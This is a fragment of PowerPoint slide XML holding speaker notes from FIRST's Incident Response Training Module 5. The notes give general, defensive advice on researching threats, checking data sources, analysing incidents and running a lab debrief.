                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79877" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3362CF2C-EE8D-3445-B4D4-A09933492C6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</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1922" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51048F93-B9B0-B841-8C2C-3445E8089DBD}"/>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B37F1261-37D4-F842-BB57-582FC2AC8BB3}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93185" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73373F81-56E8-4A49-80C8-D9391E0F99BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279400" y="2855913"/>
            <a:ext cx="6299200" cy="7981950"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>More Analysis Recommendations: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>4 minutes</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> First, you’ll want to make sure you completely understand your unique constituency and your essential assets. When you thoroughly appreciate your constituency, you can be as effective as possible, first while researching information on new threats, and secondly during triage as new attacks and actionable information arrives in your department. </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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>You will want to make sure you are as proactive as possible. Whenever an attack is launched against your organization, time is of the essence. The more proactive you are and the more background research you have done, the faster you will be able to resolve the issue. You will want to be well aware of the threats and trends that will most affect your clientele. And you will also want to stay abreast of issues and challenges that will likely affect you and your constituency in the future. </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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Design your processes, procedures, and tools to allow you to shorten the time required to investigate incidents, especially when you are working with possible security breaches. </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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Quickly traverse each and every source you have and determine which information and sources are relevant to the current problem. Of course, as your investigation evolves, your list of germane sources will also evolve. Collecting and maintaining current data is extremely important:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-227013" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Check each of the related datasets in your data store. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-227013" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="338"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Facilitate additional data collection and integration and include as wide a range of data sources as possible, always verifying the caliber of the data. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-227013" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="338"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Then ensure quality of data sources, in an orderly way.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-227013" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Apply visualization techniques by taking advantage of all pictorial displays you have available: graphs, charts, and interactive pictorial tools. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>To be most productive in your day-to-day operations you will want to use robust tools that are automated as much as possible. You will also want to have well-documented and easy-to-follow processes and procedures. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Segue:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> Let’s move on to the lab.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81924" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E7440FF-8F33-EA4B-A42E-47E413FB2720}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{330B2E01-7351-A540-B267-4766446B98AD}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81925" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1582E80A-364B-D441-AFD6-BAFC19C5E362}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</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3970" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{516B9A40-F498-F641-BFE0-84D722F364DE}"/>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30D0D889-B97F-454C-8FB9-409622DA6E8F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94209" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{522016C5-F422-614F-9332-4D326851F8F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631825" y="4343400"/>
            <a:ext cx="5592763" cy="6448425"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Module 5 Lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>1 minute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="363"/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>In this lab, we will try some data analysis in a guided scenario, and then in a scenario based on your actual work environment.</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Instructor notes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Each lab has two parts. A guided scenario and one looking at the student’s real-world environment. After the lab is complete: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" indent="-169863" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="14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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>For the guided scenario, discuss the results as you go. They should be fairly similar, although each student will make some slightly differing assumptions. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" indent="-169863" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="14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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>For the real-world section, it is best to break into small teams to debrief. This is because each individual and organization will have vastly differing environments and experience. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83972" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2A649E4-636A-AA4D-958D-56134C2C8896}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8928100"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83973" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34E63099-42F0-ED4D-B318-8E6DA07E505B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6608763" y="8931275"/>
            <a:ext cx="247650"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{63B66823-BECF-694B-BC07-8E51EB672E18}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans"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290" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC80F27E-AB10-D744-A8FC-CD6849B71794}"/>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581832AC-9C29-EC49-9E04-17996208911B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58369" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1043E765-3A86-154E-BE62-B1EB05100C9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325438" y="4106863"/>
            <a:ext cx="6205537" cy="6175375"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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000" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Analysis Is a Main Part of Your Job: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>3 minutes</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000" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>The Analysis step goes beyond enrichment by deriving new conclusions beyond what is explicitly linked to the original data. It often involves merging the original information with other sources of data. Sometimes this is trivial and in other instances quite complex. One of the most important benefits of the Analysis step is that it increases the level of information you generate. For example, you can (1) derive new indicators of compromise from raw traffic dumps or (2) characterize an orchestrated malware campaign through multiple individual indicators.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="409575" lvl="1" indent="-23018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000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Investigative work is one of your core responsibilities, taking all your input data and digging deeper into the issue on which you are currently working. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="409575" lvl="1" indent="-23018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000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Current situational awareness allows you to make intelligent decisions based on the threat landscape today. For example, if you have been attacked multiple times in the past two weeks, you are more likely to consider this issue another attack of a similar nature. In addition, as you perform your analysis, one possible outcome is improved situational awareness.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="409575" lvl="1" indent="-23018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000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Not surprisingly, you will want to keep many metrics along the way. Unfortunately, the security industry does not yet have well-established metrics, so you have to use your own judgement to pick metrics that will help you to judge the accuracy, efficiency, and output of your team. Another important set of metrics compares bot infections between different networks. These statistics will allow you to improve your processes and also compare your team with other similar teams. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="409575" lvl="1" indent="-23018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000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>And finally, you will want to create a better picture of this particular situation by expanding your analysis to as many sources as required, and again evaluating all sources for quality. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="409575" lvl="1" indent="-230188"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000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>As with the other phases in the process, we will finish up with a number of additional recommendations. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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000" b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Segue: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Let’s start discussing the basic tenets of your analysis.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12292" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39EF074A-BFDE-6A46-8797-9965A26E9E3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{D97011B5-F243-F64E-9A5B-BB8DA014FF1B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12293" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C14F557-9DE7-AA49-8F68-5D583C58FE74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
